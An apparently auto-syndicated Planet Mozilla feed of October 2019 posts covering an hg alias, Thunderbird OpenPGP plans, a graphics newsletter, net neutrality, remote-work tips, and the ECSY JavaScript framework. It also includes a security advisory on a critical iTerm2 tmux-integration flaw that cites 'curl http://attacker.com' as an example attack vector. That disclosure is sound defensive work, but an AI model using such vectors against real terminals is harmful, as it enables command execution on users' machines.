Source: http://planet.mozilla.org/.

This journal is generated from the public RSS feed at http://planet.mozilla.org/rss20.xml and is updated as that feed is updated. It may not match the content of the original page. The syndication was created automatically at the request of readers of this RSS feed.

Dave Townsend: A simple command to open all files with merge conflicts

When I get merge conflicts during a rebase, I find it irritating to open the problem files in my editor. I couldn’t find anything better than copying and pasting the file path or locating it in the source tree. So I wrote a simple hg command that opens all the unresolved files in my editor. Maybe this is useful to you too?

    [alias]
    unresolved = !$HG resolve -l "set:unresolved()" -T "{reporoot}/{path}\0" | xargs -0 $EDITOR

https://www.oxymoronical.com/blog/2019/10/A-simple-command-to-open-all-files-with-merge-conflicts

|

|



Mozilla Security Blog: Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit |

A security audit funded by the Mozilla Open Source Support Program (MOSS) has discovered a critical security vulnerability in the widely used macOS terminal emulator iTerm2. After finding the vulnerability, Mozilla, Radically Open Security (ROS, the firm that conducted the audit), and iTerm2’s developer George Nachman worked closely together to develop and release a patch to ensure users were no longer subject to this security threat. All users of iTerm2 should update immediately to the latest version (3.3.6) which has been published concurrent with this blog post.

Founded in 2015, MOSS broadens access, increases security, and empowers users by providing catalytic support to open source technologists. Track III of MOSS — created in the wake of the 2014 Heartbleed vulnerability — supports security audits for widely used open source technologies like iTerm2. Mozilla is an open source company, and the funding MOSS provides is one of the key ways that we continue to ensure the open source ecosystem is healthy and secure.

iTerm2 is one of the most popular terminal emulators in the world, and frequently used by developers. MOSS selected iTerm2 for a security audit because it processes untrusted data and it is widely used, including by high-risk targets (like developers and system administrators).

During the audit, ROS identified a critical vulnerability in the tmux integration feature of iTerm2; this vulnerability has been present in iTerm2 for at least 7 years. An attacker who can produce output to the terminal can, in many cases, execute commands on the user’s computer. Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.

Proof-of-Concept video of a command being run on a mock victim’s machine after connecting to a malicious SSH server. In this case, only a calculator was opened as a placeholder for other, more nefarious commands.

Typically this vulnerability would require some degree of user interaction or trickery; but because it can be exploited via commands generally considered safe there is a high degree of concern about the potential impact.

An update to iTerm2 is now available with a mitigation for this issue, which has been assigned CVE-2019-9535. While iTerm2 will eventually prompt you to update automatically, we recommend you proactively update by going to the iTerm2 menu and choosing Check for updates… The fix is available in version 3.3.6. A prior update (3.3.5) was published earlier this week; it does not contain the fix.

If you’d like to apply for funding or an audit from MOSS, you can find application links on the MOSS website.

The post Critical Security Issue identified in iTerm2 as part of Mozilla Open Source Audit appeared first on Mozilla Security Blog.

https://blog.mozilla.org/security/2019/10/09/iterm2-critical-issue-moss-audit/

The Firefox Frontier: Five myths about password managers

Password managers are the tool most recommended by security experts to protect your online credentials from hackers. But many people are still hesitant to use them. Here’s why password managers … Read more

The post Five myths about password managers appeared first on The Firefox Frontier.

https://blog.mozilla.org/firefox/myths-about-password-managers/

Ludovic Hirlimann: [Tips for remotees 1/xxx] Don't be Isolated.

Welcome to a new series of blog posts where I'll share, at random, tips and tricks that I've gathered over the last 10 years as a remote worker. I have worked for one company on different subjects and in two countries, as I moved from one to the other while working remotely. I have managed to work while single, married without kids, and married with kids. The advice I'll be giving here is mostly from the employee's perspective, but I'll also try to give a few hints about how to manage remotees. Disclaimer: I have not read "Distributed Teams: The Art and Practice of Working Together While Physically Apart" by my ex-coworker.

So let's start with the obvious first tip: don't stay alone. When I started working remotely I had a girlfriend, so I was quite occupied both when I was working and when I wasn't. But I was working from home, so I'd miss chitchatting with colleagues over a coffee. I was coming out of a startup that used Skype as its main chat tool, and there was (and still is) an alumni chat session. So when I had a question, or when I wanted to rant, think about something else or just take a break, I would chat with my ex-colleagues. After a few months I broke up with the woman I was with, and was left with almost no physical interaction with humans. The only thing close to it was going to a swimming pool once a week and seeing people, but hardly interacting with them. After a month or two of that regime I started looking for a new job, a non-remote one. Thankfully the 1.5-hour train ride killed the idea, and in the meantime I made local friends using the Meetup service (I was a Frenchman living in the Netherlands and met other people like me; we ended up having a weekly get-together, which led to me meeting my wife). I also had an ex-coworker living not far from me who was working on his own venture. We ended up having weekly lunches at the same restaurant, where we could both bitch about life, work and food :-p.

When I moved back to my own country, it took my ISP two weeks to provide me with Internet access. In the meantime I needed access, so I ended up going to the local co-working space. This was nice, as I could interact with people in the same situation as me (except that most of them were freelancers). They didn't have the same job or background, so I had really nice chats over tea. In the end I stopped using the co-working facilities, as I had plenty of meetings and I'm kind of a loud person, so I didn't fit in much there and was more of an annoyance than anything. But it was a really good solution for fighting loneliness or the lack of (work-related) human interaction. Finally I moved to a less populated area, where co-working didn't exist and was not an option. Lunch with friends was not an option either. The only thing that kept me connected to work and the rest of the world was IRC conversations with locals (in a broad sense of "local": I really mean French people here). The other thing that helped was my involvement in local things like the kindergarten, the library and so forth. This let me talk to people about work issues; even if they didn't understand everything, venting helped a lot.

Anne van Kesteren: The case for XML5

My XML5 idea is over twelve years old now. I still like it as web developers keep running into problems with text/html:

- Cannot arbitrarily nest elements. E.g., there is no way to create a custom element that takes the place of the td element. There is also no way to create a custom element that contains certain HTML elements, such as the tr element. (See webcomponents #113 for more.)

- Cannot have custom element start tags that are marked as self-closing. I.e., custom elements always require an explicit end tag. (See webcomponents #624 for more.)

- Cannot introduce a serialization of ShadowRoot nodes to enable server-side rendering. (See dom #510 for more.)

- Any change made to the parser can and is likely to impact the parsing of existing documents as every byte stream is converted to a tree. This has severe compatibility and security implications that should not be underestimated.

XML in browsers has much less of a compatibility footprint. Coupled with the fact that XML does not always return a tree for a given byte stream, this makes backwards-compatible extensions to it possible (in the sense that old well-formed documents parse the same way). There is a chance for it to ossify like text/html though, so perhaps XML5 ought to be amended somewhat to leave room for future changes.
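The point about parsers that always return a tree can be illustrated with a toy example. The sketch below is neither the HTML parsing algorithm nor a real XML parser: it assumes a made-up tag language with only `<name>` and `</name>` tokens, and `parseTags` is a hypothetical helper written for this illustration.

```javascript
// Toy tag language for illustration only: <name> and </name>, nothing else.
// This is neither the HTML parsing algorithm nor a real XML parser.
function parseTags(input, strict) {
  const root = { name: "#root", children: [] };
  const stack = [root];
  for (const [, slash, name] of input.matchAll(/<(\/?)([a-z]+)>/g)) {
    const top = stack[stack.length - 1];
    if (slash === "") {
      // Start tag: append a child to the current element and descend into it.
      const node = { name, children: [] };
      top.children.push(node);
      stack.push(node);
    } else if (stack.length > 1 && top.name === name) {
      // Matching end tag: close the current element.
      stack.pop();
    } else if (strict) {
      // XML-like: a mismatched end tag is an error, so no tree is produced.
      throw new SyntaxError(`unexpected </${name}>`);
    }
    // HTML-like (non-strict): the stray end tag is ignored and parsing continues.
  }
  if (strict && stack.length > 1) {
    throw new SyntaxError(`unclosed <${stack[stack.length - 1].name}>`);
  }
  return root;
}

// Well-formed input parses identically in both modes.
const same =
  JSON.stringify(parseTags("<a><b></b></a>", true)) ===
  JSON.stringify(parseTags("<a><b></b></a>", false));

// Malformed input already has a meaning in lenient mode...
const lenientTree = parseTags("<a><b></a>", false);

// ...but is rejected in strict mode, which leaves room to define it later.
let strictError = null;
try {
  parseTags("<a><b></a>", true);
} catch (e) {
  strictError = e;
}
```

In the lenient mode every input is already mapped to some tree, so changing the rules changes how existing documents parse. In the strict mode the rejected inputs could be given a meaning later without affecting documents that were already well-formed.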

(Another alternative is a new kind of format to express node trees, but then we have at least three problems.)

Mozilla Thunderbird: Thunderbird, Enigmail and OpenPGP

Today the Thunderbird project is happy to announce that for the future Thunderbird 78 release, planned for summer 2020, we will add built-in functionality for email encryption and digital signatures using the OpenPGP standard. This new functionality will replace the Enigmail add-on, which will continue to be supported until Thunderbird 68 end of life, in the Fall of 2020.

For some background on encrypted email in Thunderbird: Two popular technologies exist that add support for end-to-end encryption and digital signatures to email. Thunderbird has been offering built-in support for S/MIME for many years and will continue to do so.

The Enigmail Add-on has made it possible to use Thunderbird with external GnuPG software for OpenPGP messaging. Because the types of add-ons supported in Thunderbird will change with version 78, the current Thunderbird 68.x branch (maintained until Fall 2020) will be the last that can be used with Enigmail.

For users of Enigmail, Thunderbird 78 will offer assistance to migrate existing keys and settings. We are happy that Patrick Brunschwig, the long-time developer of Enigmail, has offered to work with the Thunderbird team on OpenPGP going forward. About this change, Patrick had this to say:

“It has always been my goal to have OpenPGP support included in the core Thunderbird product. Even though it will mark an end to a long story, after working on Enigmail for 17 years, I’m very happy with this outcome.”

Users who haven’t used Enigmail previously will need to opt in to use OpenPGP messaging, as encryption will not be enabled automatically. However, Thunderbird 78 will help users discover the new functionality.

To promote secure communication, Thunderbird 78 will encourage the user to perform ownership confirmation of keys used by correspondents, notify the user if the correspondent’s keys change unexpectedly, and, if there is an issue, offer assistance to resolve the situation.

It’s undecided whether Thunderbird 78 will support the indirect key ownership confirmations used in the Web of Trust (WoT) model, or to what extent. However, sharing of key ownership confirmations made by the user (key signatures), and interaction with OpenPGP key servers shall be possible.

If you have an interest in seeing more detailed plans on what is in store for OpenPGP in Thunderbird, check out our wiki page with more information.

https://blog.mozilla.org/thunderbird/2019/10/thunderbird-enigmail-and-openpgp/

Mozilla GFX: moz://gfx newsletter #48

Greetings! This issue of the newsletter is long overdue. Without further ado:

What’s new in gfx

Wayland dmabuf textures

Martin Stransky landed the dmabuf texture work which was at the prototype stage at the time of the previous newsletter. This is only used with the GL compositor at the moment which is not enabled by default (gfx.acceleration.force-enabled pref in about:config). Work to get dmabuf textures with WebRender is in progress.

CoreAnimation integration

Markus landed a number of infrastructure changes towards integrating with CoreAnimation and doing partial present optimizations on macOS.

This short description doesn’t do justice to the amount of work that went into this. Stay tuned, you might read some more about this on this blog soon.

Direct Composition integration

Sotaro has been working on a number of bugs in support for Direct Composition integration, including some ground work and investigation such as bugs 1585893, 1585619 and 1585278, and bug fixes like an issue involving the tab bar, direct composition, the high contrast theme and WebRender.

RGB, RGBA, BGRA, BLARGH!

Andrew landed a number of image decoding performance improvements, using SIMD to speed up pixel format conversion.

Benchmarks targeting the improvements suggested a ceiling of 25-50% faster pixel format conversions, with initial telemetry data suggesting a 5-10% real-world average improvement in decoder performance. Not bad!
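As a rough illustration of what a pixel format conversion involves, the scalar sketch below swaps the red and blue channels of a BGRA buffer to produce RGBA. The function name and buffer layout are assumptions made for this example. The actual Gecko code is not shown in the newsletter and uses SIMD to process several pixels per instruction.

```javascript
// Hypothetical helper: convert a BGRA byte buffer to RGBA, one pixel at a time.
// A SIMD implementation would shuffle several pixels per instruction instead.
function bgraToRgba(src) {
  if (src.length % 4 !== 0) {
    throw new RangeError("buffer length must be a multiple of 4");
  }
  const dst = new Uint8Array(src.length);
  for (let i = 0; i < src.length; i += 4) {
    dst[i] = src[i + 2];     // R comes from the third byte of BGRA
    dst[i + 1] = src[i + 1]; // G stays in place
    dst[i + 2] = src[i];     // B comes from the first byte of BGRA
    dst[i + 3] = src[i + 3]; // A stays in place
  }
  return dst;
}

// One opaque blue pixel in BGRA order becomes [0, 0, 255, 255] in RGBA order.
const rgba = bgraToRgba(Uint8Array.of(255, 0, 0, 255));
```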

What’s new in WebRender

WebRender is a GPU-based 2D rendering engine for the web, written in Rust, currently powering Firefox’s rendering engine as well as the research web browser Servo.

To enable WebRender in Firefox, enable the pref gfx.webrender.all in about:config and restart the browser.

WebRender is available as a standalone crate on crates.io (documentation) for use in your own Rust projects.

WebRender enabled in Firefox Preview Nightly on the Pixel 2

This is the first configuration on Android that Jamie enabled WebRender on by default. A pretty cool milestone to build upon!

Download it here: https://play.google.com/store/apps/details?id=org.mozilla.fenix.nightly

WebRender is only enabled by default on Pixel 2 phones at the moment, but on other configurations it can be enabled in about:config.

Pixel snapping

Andrew rewrote pixel snapping in WebRender. See the bug description and the six-patch series that followed to get an idea of how much work went into this.

Blob image recoordination

If you have been following this newsletter you might remember reading about “blob image recoordination” for a while now. That’s because work has been ongoing for quite a while. A lot of the patches that have been in the works for months landed recently. Blobs are now “recoordinated”.

In other words, Jeff and Nical landed a lot of infrastructure work for handling the coordinate system of blob images, WebRender’s fallback software rendering path.

This puts the fallback code on a saner foundation and allows reducing the invalidation of blob images in various scenarios such as scrolling large SVG elements, or when animations cause the bounds of a blob image to change. This translates to performance improvements on web pages that use SVG a lot.

Picture caching

Glenn landed some pretty big changes to picture caching:

- The cache is now organized as a quad-tree.

- Picture cached tiles that are only solid color use a fast path to optimize speed and memory consumption.

- There is a new composite pass with a simpler drawing model than other render passes. It is a first step towards deferring the composition of cached tiles to OS compositor APIs such as Direct Composition and Core Animation, and will allow optimizations for the upcoming software backend.

- There are now separate picture cache slices for web content, the browser UI and scroll bars.

- WebRender now generates dirty rects to allow partial present optimizations.

YUV image rendering performance

Kvark fixed YUV images being accidentally rendered in the alpha pass instead of the opaque pass. A very simple change yielding pretty significant performance improvements as it reduces the overdraw while rendering video frames.

Text rendering improvements

Lee removed Cairo usage from the Skia FreeType font host. SkFontHost_cairo depended on the interposition of Cairo for dealing with creating/loading FreeType faces. This imposed annoying limits on our Skia text rasterization such as a lack of sub-pixel text positioning on Android and Linux. It also forced us to build and maintain FcPattern structures that caused memory bloat and had performance overhead to interpret.

With this fixed, Lee enabled sub-pixel positioning on Linux and Android.

Various fixes and improvements

- Botond fixed a regression affecting WebExtensions that move a tab into a popup or panel window (1), (2).

- Botond fixed an issue that prevented Windows users with certain Acer and Asus laptops from being able to two-finger scroll on Gmail and various other websites.

- Botond fixed one of the prerequisites for enabling a hiding URL bar in Firefox Preview.

- Kvark improved WebRender’s performance when a page requires allocating a lot of cached texture memory.

- Kvark added support for the Solus Linux distribution in Gecko’s build system.

- Kvark updated the WebGPU IDL.

- Kvark fixed a few IDL bindgen issues in the process (1), (2).

- Andrew prevented border raster images from going through a slow fallback path.

- AWilcox fixed YUV image rendering on big-endian machines.

- Nical cleaned up a lot of the scene building and render graph code in WebRender.

- Kris fixed an opacity rendering issue on SVG USE elements with D2D.

- Jonathan Kew fixed a rendering issue with stroked text with ligatures.

https://mozillagfx.wordpress.com/2019/10/07/moz-gfx-newsletter-48/

The Mozilla Blog: Breaking down this week’s net neutrality court decision

This week, the U.S. Court of Appeals for the D.C. Circuit issued its ruling in Mozilla v. Federal Communications Commission (FCC), the court case to defend net neutrality protections for American consumers. The opinion opened a path for states to put net neutrality protections in place, even as the fight over FCC federal regulation is set to continue. While the decision is disappointing as it failed to restore net neutrality protections at the federal level, the fight for these essential consumer rights will continue in the states, in Congress, and in the courts.

The three-judge panel disagreed with the FCC’s argument that the FCC is able to preempt state net neutrality legislation across the board. States have already shown that they are ready to step in and enact net neutrality rules to protect consumers, with laws in California and Vermont among others. The Court is also requiring the FCC to consider the effect the repeal may have on public safety and subsidies for low-income consumer broadband internet access.

The Court did find that the FCC had discretion to treat broadband access like an information service and remove the previous rules. But as Judge Millett said (and Judge Wilkins concurred), that was with significant reservations: “I am deeply concerned that the result [of upholding much of the 2018 Order] is unhinged from the realities of modern broadband service.” Nevertheless, the judges stated that they felt their hands were tied by the existing legal precedent and invited the Supreme Court or Congress to step in.

The decision also underscores the frailty of the FCC’s approach. Questioning the FCC’s reclassification of broadband internet access from a “telecommunications service” to an “information service,” Judge Millett reprised an argument made by Mozilla and other petitioners: “[F]ollowing the Commission’s view to its logical conclusion, everything (including telephones) would be an information service. The only thing left within ‘telecommunications service’ would be the proverbial road to nowhere.”

We are exploring next steps to move the case forward for consumers, and we are grateful to be a part of a broad community pressing for net neutrality protections. We look forward to continuing this fight.

The post Breaking down this week’s net neutrality court decision appeared first on The Mozilla Blog.

https://blog.mozilla.org/blog/2019/10/04/breaking-down-this-weeks-net-neutrality-court-decision/

Chris H-C: Distributed Teams: Regional Peculiarities Like Oktoberfest and Bagged Milk

It’s Oktoberfest! You know, that German holiday about beer and lederhosen?

No. As many Germans will tell you it’s not a German thing as much as it is a Bavarian thing. It’s like saying kilts are a British thing (it’s a Scottish thing). Or that milk in bags is a Canadian thing (in Canada it’s an Eastern Canada thing).

In researching what the heck I was talking about when I was making this comparison at a recent team meeting, Alessio found a lovely study on the efficiency of milk bags as milk packaging in Ontario published by The Environment and Plastics Industry Council in 1997.

I highly recommend you skim it for its graphs and the study conclusions. The best parts for me are how it highlights that the consumption of milk (by volume) increased 22% from 1968 to 1995 while at the same time the amount (by mass) of solid waste produced by milk packaging decreased by almost 20%.

I also liked Table 8 which showed the recycling rates of the various packaging types that we’d need to reach in order to match the small amount (by mass) of solid waste generation of the (100% unrecycled) milk bags. (Interestingly, in my region you can recycle milk bags if you first rinse and dry them).

I guess what I’m trying to say about this is three-fold:

- Don’t assume regional characteristics are national in your distributed team. Berliners might not look forward to Oktoberfest the way Münchner do, and it’s possible no one in the Vancouver office owns a milk jug or bag cutter.

- Milk Bags are kinda neat, and now I feel a little proud about living in a part of the world where they’re common. I’d be a little more confident about this if the data wasn’t presented by the plastics industry, but I’ll take what I can get (and I’ll start recycling my milk bags).

- Geez, my team can find data for _any topic_. What differences we have by being distributed around the world are eclipsed by how we’re universally a bunch of nerds.

:chutten

Patrick Cloke: Celery AMQP Backends

Note

This started as notes explaining the internals of how Celery’s AMQP backends operate. This isn’t meant to be a comparison or prove one is better or that one is broken. There just seemed to be a lack of documentation about the design and limitations of each backend …

https://patrick.cloke.us/posts/2019/10/04/celery-amqp-backends/

The Firefox Frontier: Browse in peace on your phone with Firefox thanks to Enhanced Tracking Protection

Imagine that you’ve been going from shop to shop looking for a cow-shaped butter dish. Later, you walk into a department store and a salesperson walks right up to you … Read more

The post Browse in peace on your phone with Firefox thanks to Enhanced Tracking Protection appeared first on The Firefox Frontier.

https://blog.mozilla.org/firefox/firefox-mobile-enhanced-tracking-protection/

Mozilla VR Blog: Introducing ECSY: an Entity Component System framework for the Web

Today we are introducing ECSY (pronounced “eck-see”): a new, highly experimental Entity Component System framework for JavaScript.

After working on many interactive graphics projects for the web over the last few years, we tried to identify the common issues that come up when developing something bigger than a simple example.

Based on our findings we discussed what an ideal framework would need:

- Component-based: Help to structure and reuse code across multiple projects.

- Predictable: Avoids random events or callbacks interrupting the main flow, which would make it hard to debug or trace what is going on in the application.

- Good performance: Most web graphics applications are CPU bound, so we should focus on performance much more.

- Simple API: The core API should be simple, making the framework easier to understand, optimize and contribute to; but also allow building more complex layers on top of it if needed.

- Graphics engine agnostic: It should not be tied to any specific graphics engine or framework.

These requirements are high-level features that are not usually provided by graphics engines like three.js or babylon.js. On the other hand, A-Frame provides a nice component-based architecture, which is really handy when developing bigger projects, but it lacks the rest of the previously mentioned features. For example:

- Performance: Dealing with the DOM implies overhead. Although we have been building A-Frame applications with good performance, this was done by breaking the API contract, for example by accessing the values of the components directly instead of using setAttribute/getAttribute. This can lead to some unwanted side effects, such as incompatibility between components and a lack of reactive behavior.

- Predictable: Dealing with asynchrony because of the DOM life cycle or the events’ callbacks when modifying attributes makes the code really hard to debug and to trace.

- Graphics engine agnostic: Currently A-Frame and its components are so strongly tied to three.js that it makes no sense to change it to any other engine.

After analyzing these points, gathering our experience with three.js and A-Frame, and looking at the state of the art in game engines like Unity, we decided to work on building this new framework using a pure Entity Component System architecture. The difference between a pure ECS like Unity DOTS, entt, or Entitas, and a more object-oriented approach, such as Unity’s MonoBehaviour or A-Frame's Components, is that in the latter the components and systems both have logic and data, while with a pure ECS approach components just have data (without logic) and the logic resides in the systems.
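The distinction can be sketched in a few lines of plain JavaScript. This is only an illustration, not ECSY's API: `MovingObject`, `movementSystem` and the entity shape used here are hypothetical names chosen for the example.

```javascript
// Object-oriented style: the component carries both data and behavior.
class MovingObject {
  constructor(x, vx) {
    this.x = x;
    this.vx = vx;
  }
  update(delta) {
    this.x += this.vx * delta;
  }
}

// Pure ECS style: components are plain data holders...
class Position {
  constructor(x = 0) {
    this.x = x;
  }
}
class Velocity {
  constructor(x = 0) {
    this.x = x;
  }
}

// ...and the logic lives in a system that processes that data.
function movementSystem(entities, delta) {
  for (const entity of entities) {
    entity.position.x += entity.velocity.x * delta;
  }
}

const oo = new MovingObject(0, 2);
oo.update(5);

const entities = [{ position: new Position(0), velocity: new Velocity(2) }];
movementSystem(entities, 5);
// Both approaches move the object to x = 10; they differ in where the logic lives.
```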

Focusing on building a simple core for this new framework helps iterate faster when developing new applications and lets us implement new features on top of it as needed. It also allows us to use it with existing libraries such as three.js, Babylon.js, Phaser and PixiJS, to interact directly with the DOM, Canvas or WebGL APIs, or to prototype around new APIs such as WebGPU, WebAssembly or WebWorkers.

Architecture

We decided to use a data-oriented architecture as we noticed that having data and logic separated helps us think better about the structure of our applications. This also allows us to work internally on optimizations, for example how to store and access this data or how to take advantage of parallelism for the logic.

The terms you must know in order to work with our framework are mostly the same as any other ECS:

- Entities: Empty objects with unique IDs that can have multiple components attached to them.

- Components: Different facets of an entity. ex: geometry, physics, hit points. Components only store data.

- Systems: Where the logic is. They do the actual work by processing entities and modifying their components. They are data processors, basically.

- Queries: Used by systems to determine which entities they are interested in, based on the components the entities own.

- World: A container for entities, components, systems, and queries.
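To make these terms concrete, here is a toy ECS written from scratch. It is a sketch under simplifying assumptions, not ECSY's implementation or API: `ToyWorld` and all of its methods are hypothetical, entities are bare numeric ids, and a system is just a function.

```javascript
// Toy ECS, not ECSY's implementation: every name here is hypothetical.
class ToyWorld {
  constructor() {
    this.nextId = 0;
    this.entities = new Map(); // entity id -> Map(component class -> instance)
    this.systems = [];
  }
  // An entity is just a unique id with an (initially empty) set of components.
  createEntity() {
    const id = this.nextId++;
    this.entities.set(id, new Map());
    return id;
  }
  // Components only store data; initial values are copied onto a new instance.
  addComponent(id, Component, values = {}) {
    this.entities.get(id).set(Component, Object.assign(new Component(), values));
    return this;
  }
  get(id, Component) {
    return this.entities.get(id).get(Component);
  }
  // A query selects the ids of entities that own every listed component.
  query(components) {
    return [...this.entities]
      .filter(([, owned]) => components.every(C => owned.has(C)))
      .map(([id]) => id);
  }
  registerSystem(system) {
    this.systems.push(system);
    return this;
  }
  // Systems hold the logic and run in registration order.
  execute(delta) {
    for (const system of this.systems) system(this, delta);
  }
}

class Position {
  constructor() {
    this.x = 0;
  }
}
class Velocity {
  constructor() {
    this.x = 0;
  }
}

const world = new ToyWorld();
const moving = world.createEntity();
world.addComponent(moving, Position).addComponent(moving, Velocity, { x: 3 });
const still = world.createEntity();
world.addComponent(still, Position);

// This system only touches entities that have both Position and Velocity.
world.registerSystem((w, delta) => {
  for (const id of w.query([Position, Velocity])) {
    w.get(id, Position).x += w.get(id, Velocity).x * delta;
  }
});
world.execute(2);
```

After `world.execute(2)`, only the entity that owns both components has moved. The entity with just a `Position` is never selected by the query.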

Example

So far all the information has been quite abstract, so let’s dig into a simple example to see how the API feels.

The example will consist of boxes and circles moving around the screen, nothing fancy but enough to understand how the API works.

We will start by defining components that will be attached to the entities in our application:

- Position: The position of the entity on the screen.

- Velocity: The speed and direction in which the entity moves.

- Shape: The type of shape the entity has: circle or box.

Now we will define the systems that will hold the logic in our application:

- MovableSystem: It will look for entities that have velocity and position and it will update their position component.

- RendererSystem: It will paint the shapes at their current position.

Below is the code for the example described; some parts have been omitted for brevity (check the full source code on GitHub or Glitch).

We start by defining the components we will be using:

    // Classes used in the snippets below, imported from the ecsy package
    import { System, TagComponent, World } from "ecsy";

    // Velocity component
    class Velocity {
      constructor() {
        this.x = this.y = 0;
      }
    }

    // Position component
    class Position {
      constructor() {
        this.x = this.y = 0;
      }
    }

    // Shape component
    class Shape {
      constructor() {
        this.primitive = 'box';
      }
    }

    // Renderable component (a tag: it carries no data)
    class Renderable extends TagComponent {}

Now we implement the two systems our example will use:

    // MovableSystem
    class MovableSystem extends System {
      // This method will get called on every frame by default
      execute(delta, time) {
        // Iterate through all the entities on the query
        this.queries.moving.results.forEach(entity => {
          var velocity = entity.getComponent(Velocity);
          var position = entity.getMutableComponent(Position);
          position.x += velocity.x * delta;
          position.y += velocity.y * delta;

          // Wrap around when the shape leaves the canvas
          if (position.x > canvasWidth + SHAPE_HALF_SIZE) position.x = - SHAPE_HALF_SIZE;
          if (position.x < - SHAPE_HALF_SIZE) position.x = canvasWidth + SHAPE_HALF_SIZE;
          if (position.y > canvasHeight + SHAPE_HALF_SIZE) position.y = - SHAPE_HALF_SIZE;
          if (position.y < - SHAPE_HALF_SIZE) position.y = canvasHeight + SHAPE_HALF_SIZE;
        });
      }
    }

    // Define a query of entities that have "Velocity" and "Position" components
    MovableSystem.queries = {
      moving: {
        components: [Velocity, Position]
      }
    }

    // RendererSystem
    class RendererSystem extends System {
      // This method will get called on every frame by default
      execute(delta, time) {
        // Clear the canvas
        ctx.globalAlpha = 1;
        ctx.fillStyle = "#ffffff";
        ctx.fillRect(0, 0, canvasWidth, canvasHeight);

        // Iterate through all the entities on the query
        this.queries.renderables.results.forEach(entity => {
          var shape = entity.getComponent(Shape);
          var position = entity.getComponent(Position);
          if (shape.primitive === 'box') {
            this.drawBox(position);
          } else {
            this.drawCircle(position);
          }
        });
      }

      // drawCircle and drawBox hidden for simplification
    }

    // Define a query of entities that have "Renderable" and "Shape" components
    RendererSystem.queries = {
      renderables: { components: [Renderable, Shape] }
    }

We create a world and register the systems that it will use:

    var world = new World();
    world
      .registerSystem(MovableSystem)
      .registerSystem(RendererSystem);

We create some entities with random position, speed, and shape.

    for (let i = 0; i < NUM_ELEMENTS; i++) {
      world
        .createEntity()
        .addComponent(Velocity, getRandomVelocity())
        .addComponent(Shape, getRandomShape())
        .addComponent(Position, getRandomPosition())
        .addComponent(Renderable);
    }

Finally, we just have to update it on each frame:

    function run() {
      // Compute delta and elapsed time
      var time = performance.now();
      var delta = time - lastTime;

      // Run all the systems
      world.execute(delta, time);

      lastTime = time;
      requestAnimationFrame(run);
    }

    var lastTime = performance.now();
    run();

Features

The main features that the framework currently has are:

- Engine/framework agnostic: You can use ECSY directly with whichever 2D or 3D engine you are already used to. We have provided some simple examples for Babylon.js, three.js, and 2D canvas. To make things even easier, we plan to release a set of bindings and helper components for the most commonly used engines, starting with three.js.

- Focused on providing a simple, yet efficient API: We want to make sure to keep the API surface as small as possible, so that the core remains simple and is easy to maintain and optimize. More advanced features can be layered on top, rather than being baked into the core.

- Designed to avoid garbage collection as much as possible: It will try to use pools for entities and components whenever possible, so objects won’t be allocated when adding new entities or components to the world.

- Systems, entities, and components are scoped in a “world” instance: It means that we don’t register the components or systems on the global scope, allowing you to have multiple worlds or apps running on the same page without interferences between them.

- Multiple queries per system: You can define as many queries per system as you want.

- Reactive support:

  - Systems can react to changes in the entities and components.

  - Systems can get mutable or immutable references to components on an entity.

- Predictable:

  - Systems will always run in the order they were registered or based on a priority attribute.

  - Reactive events won’t generate “random” callbacks when emitted. Instead they will be queued and processed in order, when the listener systems are executed.

- Modern JavaScript: ES6, classes, modules
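The pooling idea from the feature list can be illustrated with a short sketch. This is not ECSY's actual implementation: `ObjectPool`, `acquire`, `release`, and the shape of the position object are hypothetical names chosen for this example.

```javascript
// Hypothetical object pool: reuses released instances instead of allocating new ones.
class ObjectPool {
  constructor(factory, reset) {
    this.factory = factory; // creates a fresh instance when the pool is empty
    this.reset = reset;     // restores an instance to its default state
    this.free = [];         // instances waiting to be reused
    this.created = 0;       // number of instances allocated so far
  }

  acquire() {
    if (this.free.length > 0) {
      return this.free.pop();
    }
    this.created++;
    return this.factory();
  }

  release(obj) {
    this.reset(obj);
    this.free.push(obj);
  }
}

// A pool of plain position objects (the shape is an assumption for this example).
const positionPool = new ObjectPool(
  () => ({ x: 0, y: 0 }),
  (p) => { p.x = 0; p.y = 0; }
);

const a = positionPool.acquire();
a.x = 10;
positionPool.release(a);

// The released object is handed back, so no new allocation happens here.
const b = positionPool.acquire();
```

Because released objects are reset and reused, steady-state creation and removal of entities or components would not need to produce new garbage for the collector.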

What’s next?

This project is still in its early days, so you can expect a lot of changes to the API and many new features to arrive in the upcoming weeks. Some of the ideas we would like to work on are:

- Syntactic sugar: As the API is still evolving we have not focused on adding a lot of syntactic sugar, so currently there are places where the code is very verbose.

- Developer tools: In the coming weeks we plan to release a developer tools extension to visualize the status of the ECS on your application and help you debug and understand its status.

- ecsy-three: As discussed previously ecsy is engine-agnostic, but we will be working on providing bindings for commonly used engines starting with three.js.

- Declarative layer: Based on our experience working with A-Frame, we understand the value of having a declarative layer so we would like to experiment with that on ECSY too.

- More examples: Keep using a diverse range of underlying APIs, such as canvas, WebGL and engines like three.js, Babylon.js, etc.

- Performance: We have not really dug into optimizations on the core yet. We plan to look into them in the upcoming weeks and publish benchmarks and results. The main goal of this initial release was to have an API we like so we could then focus on the core in order to make it run as fast as possible.

You may notice that ECSY is not focused on data-locality or memory layout as much as many native ECS engines. This has not been a priority in ECSY because in JavaScript we have far less control over the way things are laid out in memory and how our code gets executed on the CPU. We get far bigger wins by focusing on preventing unnecessary garbage collection and optimizing for JIT. This story will change quite a bit with WASM, so it is certainly something we want to explore for ECSY in the future.

- WASM: We want to try to implement parts of the core or some systems on WASM to take advantage of strict memory layout and parallelism by using WASM threads and SharedArrayBuffers.

- WebWorkers: We will be working on examples showing how you can move systems to a worker to run them in parallel.

Please feel free to use GitHub to follow the development, request new features, or file issues for bugs you find; our Discourse forum to discuss how to use ECSY in your projects; and ecsy.io for more examples and documentation.

|

|

The Rust Programming Language Blog: Announcing the Inside Rust blog |

Today we're happy to announce that we're starting a second blog, the Inside Rust blog. This blog will be used to post regular updates by the various Rust teams and working groups. If you're interested in following along with the "nitty gritty" of Rust development, then you should take a look!

|

|

Mozilla Addons Blog: Friend of Add-ons: B.J. Herbison |

Please meet our newest Friend of Add-ons, B.J. Herbison! B.J. is a longtime Mozillian and joined the add-on content review team for addons.mozilla.org two years ago, where he helps quickly respond to spam submissions and ensures that public listings abide by Mozilla’s Acceptable Use Policy.

